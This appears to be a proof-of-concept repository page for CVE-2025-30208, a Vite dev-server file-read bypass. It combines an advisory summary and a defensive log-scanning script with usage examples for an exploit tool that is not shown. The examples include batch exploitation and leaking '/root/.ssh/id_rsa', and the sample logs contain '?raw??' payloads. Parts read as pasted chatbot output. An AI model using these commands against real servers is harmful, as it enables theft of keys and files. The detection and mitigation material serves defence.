Associated Vulnerability
Title: Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)
Description: Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Description
CVE-2025-30208
Readme
# CVE-2025-30208 Vite Arbitrary File Read vulnerability 🌌
Here's a detailed overview of **CVE-2025-30208**, a medium-severity arbitrary file-read vulnerability in Vite's dev server:
---
## 🛠️ What is it?
* Vite's `@fs` endpoint (the `/@fs/` URL prefix) lets the dev server serve files by filesystem path in development mode, restricted to the directories listed in `server.fs.allow`.
* Versions **before** 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 contain a flaw: URLs crafted with trailing query markers like `?raw??` or `?import&raw??` can bypass access restrictions and expose arbitrary files (e.g., system or source files) ([nvd.nist.gov][1]).
---
## 🔍 Who's affected?
* Vite dev servers explicitly **exposed to the network**, enabled via `--host` or `server.host`.
* Vulnerable version ranges:
  * 4.5.0 – 4.5.9
  * 5.0.0 – 5.4.14
  * 6.0.0 – 6.2.2 (that is, 6.0.x below 6.0.12, 6.1.x below 6.1.2, and 6.2.x below 6.2.3) ([nsfocusglobal.com][2]).
---
## ⚠️ Severity & Impact
* **CVSS 3.1 score: 5.3 (Medium 🟠)**: Network attack, no privileges, high confidentiality impact ([wiz.io][3]).
* Exploitability: straightforward via crafted HTTP requests to exposed development servers ([wiz.io][3]).
* Public PoC is available, including scripts demonstrating `/etc/passwd` leaks ([github.com][4]).
---
## 🛡️ Mitigation & Response
* **Upgrade Vite** to one of the patched versions:
* **6.2.3**, **6.1.2**, **6.0.12**, **5.4.15**, or **4.5.10** ([nvd.nist.gov][1]).
* **Avoid exposing** dev servers to public networks; limit with `localhost` or firewall rules ([wiz.io][3]).
* Additional scanning tools (e.g., NSFocus EZ, Sangfor, Tenable) support detection ([nsfocusglobal.com][2]).
---
## ✅ Summary Table
| Aspect | Details |
| ------------------ | ---------------------------------------------------------- |
| **Flaw** | `@fs` path filter bypass via malformed query strings |
| **Versions** | <4.5.10, <5.4.15, <6.0.12, <6.1.2, <6.2.3 |
| **Severity** | Medium (CVSS 5.3), network exploit, confidentiality impact |
| **Exploitability** | Easy; PoC exists |
| **Patched in** | Vite 4.5.10, 5.4.15, 6.0.12, 6.1.2, 6.2.3 |
| **Mitigation** | Upgrade + avoid exposing dev server |
---
## 🔗 References & Sources
* NVD / GitHub Advisory (Mar 24 2025) ([nvd.nist.gov][1], [wiz.io][3], [security.snyk.io][4], [recordedfuture.com][5])
* Technical writeups: NSFocus, Sangfor, Snyk, Recorded Future
---
## ✅ Recommended Next Steps
1. **Audit your Vite versions** in development environments, especially any exposed externally.
2. **Upgrade** immediately to a fixed version.
3. **Restrict access** to development servers—bind to `localhost`, use VPNs or firewalls.
4. **Run security scans/tools** to detect CVE-2025-30208 in your infrastructure.
5. **Monitor your logs** for suspicious `/@fs/...?...?` requests.
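As an added example (not part of this README or the PoC script), the following Python script implements step 5 against constructed access-log lines. It flags `/@fs/` requests whose query string carries the dangling second `?` that the advisory describes (`?raw??`, `?import&raw??`), which is the same trailing-separator condition explained under "What is it?". The script percent-decodes the request target before checking, which is an assumption added here (encoded variants are not discussed above); the log format, sample lines and function names are all constructed for this example.

```python
"""Scan dev-server access logs for the CVE-2025-30208 request shape.

Added example; log format, sample lines and names are constructed and are
not taken from the PoC script.  Assumes common/combined log format:
  CLIENT - - [TIME] "METHOD TARGET HTTP/x.y" STATUS SIZE
"""
import re
from urllib.parse import unquote

# Constructed sample lines: one ordinary asset, one legitimate /@fs/ import,
# one ?raw request outside /@fs/, and three requests carrying the dangling
# second '?' (the last one percent-encoded).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2025:10:00:01 +0000] "GET /src/main.ts HTTP/1.1" 200 512
10.0.0.5 - - [24/Mar/2025:10:00:02 +0000] "GET /@fs/home/dev/app/src/App.vue?import HTTP/1.1" 200 1024
10.0.0.7 - - [24/Mar/2025:10:00:03 +0000] "GET /assets/logo.svg?raw HTTP/1.1" 200 900
10.0.0.9 - - [24/Mar/2025:10:00:04 +0000] "GET /@fs/etc/passwd?raw?? HTTP/1.1" 200 2048
10.0.0.9 - - [24/Mar/2025:10:00:05 +0000] "GET /@fs/etc/hostname?import&raw?? HTTP/1.1" 403 0
10.0.0.9 - - [24/Mar/2025:10:00:06 +0000] "GET /@fs/etc/hosts%3Fraw%3F%3F HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def is_suspicious_target(target: str) -> bool:
    """True when TARGET has the bypass shape from the advisory.

    Legitimate Vite traffic under /@fs/ carries at most one '?' (e.g. ?import,
    ?v=<hash>).  The bypass leaves a second, dangling '?' in the query because
    trailing separators are stripped elsewhere but not in the query regexes.
    """
    decoded = unquote(target)  # assumption: also catch %3F-encoded variants
    path, sep, query = decoded.partition("?")
    return path.startswith("/@fs/") and sep == "?" and "?" in query


def scan_log(text: str) -> list[dict]:
    """Return one finding per suspicious request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if m is None or not is_suspicious_target(m["target"]):
            continue
        path, _, query = unquote(m["target"]).partition("?")
        findings.append({
            "line": lineno,
            "client": m["client"],
            "path": path,  # file the request asked the dev server for
            "query": query,
            "status": m["status"],
            # A 2xx means the dev server handed the content out; a 403 means
            # the deny check held (patched version, or path outside the allow list).
            "served": m["status"].startswith("2"),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "SERVED" if f["served"] else "blocked"
        print(f"line {f['line']}: {f['client']} -> {f['path']}?{f['query']} "
              f"[{f['status']} {verdict}]")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the `served` flag separates probes that actually leaked content (a 2xx on a path outside the project) from ones the server refused, which is the distinction that matters when deciding whether an exposed dev server needs incident handling rather than just an upgrade.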
Let me know if you'd like help implementing fixes, crafting firewall rules, or assessing exposure!
[1]: https://nvd.nist.gov/vuln/detail/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Detail - NVD"
[2]: https://nsfocusglobal.com/vite-arbitrary-file-read-vulnerability-cve-2025-30208/?utm_source=chatgpt.com "Vite Arbitrary File Read vulnerability (CVE-2025-30208) - NSFocus"
[3]: https://www.wiz.io/vulnerability-database/cve/cve-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Impact, Exploitability, and Mitigation Steps | Wiz"
[4]: https://security.snyk.io/vuln/SNYK-JS-VITE-9512410?utm_source=chatgpt.com "Incorrect Authorization in vite | CVE-2025-30208 | Snyk"
[5]: https://www.recordedfuture.com/vulnerability-database/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Description, Impact and Technical Details"
## Examples:
1- Single target exploitation:
```
python3 cve-2025-30208.py -u example.com:5173
```
2- Single target with custom LFI path to leak the file we want:
```
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'
```
3- Batch exploitation with multiple targets:
```
python3 cve-2025-30208.py -f targets.txt
```
4- Custom bypass query:
```
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"
```
5- Using a proxy (e.g. Burp Suite):
```
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080
```
6- Custom output directory:
```
python3 cve-2025-30208.py -u example.com:5173 -o ./loot
```
7- Increase thread count in batch mode:
```
python3 cve-2025-30208.py -f targets.txt -t 50
```
## ⚠️ Disclaimer
This project is created for **educational and research purposes only**. The author is not responsible for any misuse of this tool or information provided herein.
Using this software against systems without explicit permission is **illegal** and strictly prohibited. Always ensure you have **written authorization** before performing any security testing.
By using this repository, you agree to comply with all applicable local, state, national, and international laws.
File Snapshot
[4.0K] /data/pocs/3a1071264f0ede1cfce156b2f5fac94908a40ec2
├── [5.1K] CVE-2025-30208.py
└── [4.9K] README.md
0 directories, 2 files